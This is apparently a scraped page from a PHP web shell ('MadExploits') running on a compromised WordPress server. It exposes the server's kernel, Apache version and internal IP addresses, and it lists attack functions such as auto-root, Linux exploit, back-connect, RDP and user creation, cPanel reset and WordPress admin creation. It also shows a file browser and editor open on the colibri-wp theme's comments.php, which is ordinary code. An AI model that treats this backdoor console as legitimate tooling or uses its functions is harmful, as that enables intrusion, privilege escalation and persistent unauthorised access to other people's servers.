Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
themes /
colibri-wp /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
106
B
-rw-r--r--
comments.php
1.42
KB
-rw-r--r--
footer.php
114
B
-rw-r--r--
functions.php
1.5
KB
-rw-r--r--
header.php
584
B
-rw-r--r--
index.php
81
B
-rw-r--r--
page.php
99
B
-rw-r--r--
readme.txt
8.6
KB
-rw-r--r--
screenshot.jpg
99.86
KB
-rw-r--r--
sidebar-ecommerce-left.php
108
B
-rw-r--r--
sidebar.php
54
B
-rw-r--r--
single.php
98
B
-rw-r--r--
style.css
442.29
KB
-rw-r--r--
woocommerce.php
83
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php if ( post_password_required() ): return; endif; ?> <div class="post-comments"> <h3 class="comments-title"> <span class="comments-number"> <?php comments_number( __( 'No Responses', 'colibri-wp' ), __( 'One Response', 'colibri-wp' ), __( '% Responses', 'colibri-wp' ) ); ?> </span> </h3> <ol class="comment-list"> <?php wp_list_comments( array( 'avatar_size' => '32', ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ): ?> <div class="navigation"> <div class="prev-posts"> <?php previous_comments_link( __( '<i class="font-icon-post fa fa-angle-double-left"></i> Older Comments', 'colibri-wp' ) ); ?> </div> <div class="next-posts"> <?php next_comments_link( __( 'Newer Comments <i class="font-icon-post fa fa-angle-double-right"></i>', 'colibri-wp' ) ); ?> </div> </div> <?php endif; ?> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ): ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'colibri-wp' ); ?></p> <?php endif; ?> </div> <!-- /post-comments --> <div class="comments-form"> <div class="comment-form"> <?php comment_form( array( 'class_submit' => 'button blue small', ) ); ?> </div> </div>
Close